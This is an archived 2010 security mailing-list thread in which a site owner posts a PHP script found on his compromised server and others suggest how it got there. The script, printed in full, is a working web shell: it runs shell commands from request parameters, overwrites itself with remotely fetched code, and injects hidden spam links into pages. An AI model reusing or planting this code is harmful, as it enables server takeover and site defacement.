Thanks all. I googled for "adsttnmq1" earlier and found some stuff. Looking through my logs, I found an IP of a host making a POST to one of the URLs in question. Still looking more into what it was doing.
Thanks Adrian On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <[email protected]>wrote: > Historically, I've seen this stuff done through a Remote File Include, > tho I can think of a dozen other ways to get it up on your server. I'd > probably start by digging through the logs looking for someone > including this file in some URL parameter. > > > > On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> > wrote: > > A search for the string abcdefghiklmnjsweqrtyuiopzx shows a forum > > thread with some info on this file: > > > > http://www.webhostingtalk.com/showthread.php?t=876121 > > > > I'm sure there are other sources of info out there. Time for some > forensic > > analysis of your logs to work out how and when this got here. I'm > guessing > > an automated attack against a known vuln in a PHP app? > > > > Jim > > > > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: > >> > >> Ok, I think one of my sites may have been compromised. I found the > >> following PHP script on a site, but I'm not sure what it is trying to > do. > >> Anyone else ever seen this script before? 
> >> > >> Adrian > >> > >> <?php > >> ignore_user_abort(1); > >> set_time_limit(0); > >> > >> function Clear() > >> { > >> unlink("c"); > >> unlink("1r"); > >> unlink("log"); > >> } > >> > >> function Clear2() > >> { > >> $mrd = trim(file_get_contents("m")); > >> $pt = "../$mrd"; > >> $fin = file_get_contents($pt); > >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); > >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); > >> $fin = ereg_replace("<!--dd4-->", "", $fin); > >> $fin = ereg_replace("<!--dd5-->", "", $fin); > >> $fin = ereg_replace("<font style=\"position: absolute;overflow: > >> hidden;height: 0;width: 0\">", "", $fin); > >> $fmrd = fopen($pt, "w+"); > >> fwrite($fmrd, $fin); > >> fclose($fmrd); > >> echo " upt-ok"; > >> } > >> > >> function GetVar($name, &$var) > >> { > >> $var = ""; > >> if (isset($_POST[$name])) > >> $var = $_POST[$name]; > >> > >> if (isset($_GET[$name])) > >> $var = $_GET[$name]; > >> > >> if (($var) =="") > >> return false; > >> else return true; > >> } > >> > >> function Gen() > >> { > >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; > >> $maps = array(); > >> if (isset($_POST["sg"])) > >> $sg = $_POST["sg"]; > >> > >> if (isset($_GET["sg"])) > >> $sg = $_GET["sg"]; > >> > >> if (isset($_POST["gm"])) > >> $g = $_POST["gm"]; > >> > >> if (isset($_GET["gm"])) > >> $g = $_GET["gm"]; > >> > >> > >> $path = ""; > >> $fr = fopen("1r", "a+"); > >> if (file_exists("c")) > >> { > >> $fconf = file("c"); > >> $tname = trim($fconf[0]); > >> $cname = trim($fconf[1]); > >> $curs = trim($fconf[2]); > >> $pid = trim($fconf[3]); > >> if ($pid == 100) > >> { > >> $pid = 0; > >> $rnd = mt_rand(0, 999); > >> $nm = ""; > >> for ($i=0; $i<3; $i++) > >> { > >> $ran = mt_rand(0,26); > >> $sym = $alp[$ran]; > >> $nm = $nm.$sym; > >> } > >> $cname = $nm; > >> mkdir("$tname/$cname"); > >> $curs = $g; > >> } 
> >> } > >> else > >> { > >> $rnd = mt_rand(0, 999); > >> $nm = ""; > >> for ($i=0; $i<5; $i++) > >> { > >> $ran = mt_rand(0,26); > >> $sym = $alp[$ran]; > >> $nm = $nm.$sym; > >> } > >> $tname = $nm; > >> $pid = 0; > >> $curs = $g; > >> mkdir($tname); > >> $fht = fopen("$tname/.htaccess", "w+"); > >> $htname = $sg."2.txt"; > >> $fp = fopen($htname, "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc = fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> fwrite($fht, $fin); > >> fclose($fht); > >> $rnd = mt_rand(0, 999); > >> $nm = ""; > >> for ($i=0; $i<3; $i++) > >> { > >> $ran = mt_rand(0,26); > >> $sym = $alp[$ran]; > >> $nm = $nm.$sym; > >> } > >> $cname = $nm; > >> mkdir("$tname/$cname"); > >> } > >> $gname = $sg."sgen.php"; > >> for ($j=$pid; $j<$pid+10; $j++) > >> { > >> $fp = fopen($gname."?g=$curs", "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc = fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> > >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); > >> fwrite($fnd, $fin); > >> fclose($fnd); > >> } > >> > >> if ($j==100) > >> { > >> $fp = fopen($gname."?g=$curs&m=1", "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc = fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); > >> fwrite($fnd, $fin); > >> fclose($fnd); > >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; > >> fwrite($fr,"$map\n"); > >> } > >> > >> $fconf = fopen("c", "w+"); > >> fwrite($fconf, $tname."\n"); > >> fwrite($fconf, $cname."\n"); > >> fwrite($fconf, $curs."\n"); > >> $nj = $j; > >> fwrite($fconf, $nj."\n"); > >> fclose($fconf); > >> } > >> > >> function Update() > >> { > >> $thisname = "1.php"; > >> if (isset($_POST['u'])) > >> $u = $_POST['u']; > >> > >> if (isset($_GET['u'])) > >> $u = $_GET['u']; > >> > >> $fp = fopen($u, "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc 
= fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> > >> $fthis = fopen($thisname, "w+"); > >> fwrite($fthis, $fin); > >> fclose($fthis); > >> } > >> > >> function Com() > >> { > >> if (isset($_POST['c'])) > >> @system($_POST['c']); > >> if (isset($_GET['c'])) > >> @system($_GET['c']); > >> } > >> > >> function UpKos() > >> { > >> $mrd = trim(file_get_contents("m")); > >> $pt = "../$mrd"; > >> $fin = file_get_contents($pt); > >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); > >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); > >> $fmrd = fopen($pt, "w+"); > >> fwrite($fmrd, $fin); > >> fclose($fmrd); > >> } > >> > >> > >> function MRepl() > >> { > >> $mpt = ""; > >> $drs = ""; > >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: > >> hidden;height: 0;width: 0\">"; > >> $endtag = "</font></body></html><sdioyslkjs2> "; > >> $mrd = trim(file_get_contents("m")); > >> $pt = "../$mrd"; > >> $fin = file_get_contents($pt); > >> GetVar("mpt", $mpt); > >> // óäàëÿåì çàâåðøàþùèå õòìë òåãè > >> $fin = preg_replace ("/<\/body>/i", "", $fin); > >> $fin = preg_replace ("/<\/html>/i", "", $fin); > >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > >> $fp = fopen($mpt, "r"); > >> GetVar("drs", $drs); > >> $fin = $fin.$begtag; > >> $drs = str_replace("\\", "", $drs); > >> $fin = $fin.$drs; > >> $fin = $fin.$endtag; > >> $fmrd = fopen($pt, "w+"); > >> fwrite($fmrd, $fin); > >> fclose($fmrd); > >> } > >> > >> function Main() > >> { > >> if (isset($_POST['u']) || isset($_GET['u'])) > >> { > >> Update(); > >> exit(); > >> } > >> > >> if (isset($_POST['c']) || isset($_GET['c'])) > >> { > >> Com(); > >> exit(); > >> } > >> > >> if (isset($_POST['uk']) || isset($_GET['uk'])) > >> { > >> UpKos(); > >> exit(); > >> } > >> > >> if (isset($_POST['g']) || isset($_GET['g'])) > >> { > >> Gen(); > >> exit(); > >> } > >> > >> if 
(isset($_POST['s']) || isset($_GET['s'])) > >> { > >> MRepl(); > >> exit(); > >> } > >> > >> if (isset($_POST['cl']) || isset($_GET['cl'])) > >> { > >> Clear(); > >> exit(); > >> } > >> > >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) > >> { > >> Clear2(); > >> exit(); > >> } > >> > >> echo "<ok>"; > >> > >> } > >> > >> Main(); > >> > >> ?> > >> > >> _______________________________________________ > >> Pauldotcom mailing list > >> [email protected] > >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > >> Main Web Site: http://pauldotcom.com > > > > > > _______________________________________________ > > Pauldotcom mailing list > > [email protected] > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > > > > > > -- > Andrew Ellis > http://blog.psych0tik.net > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
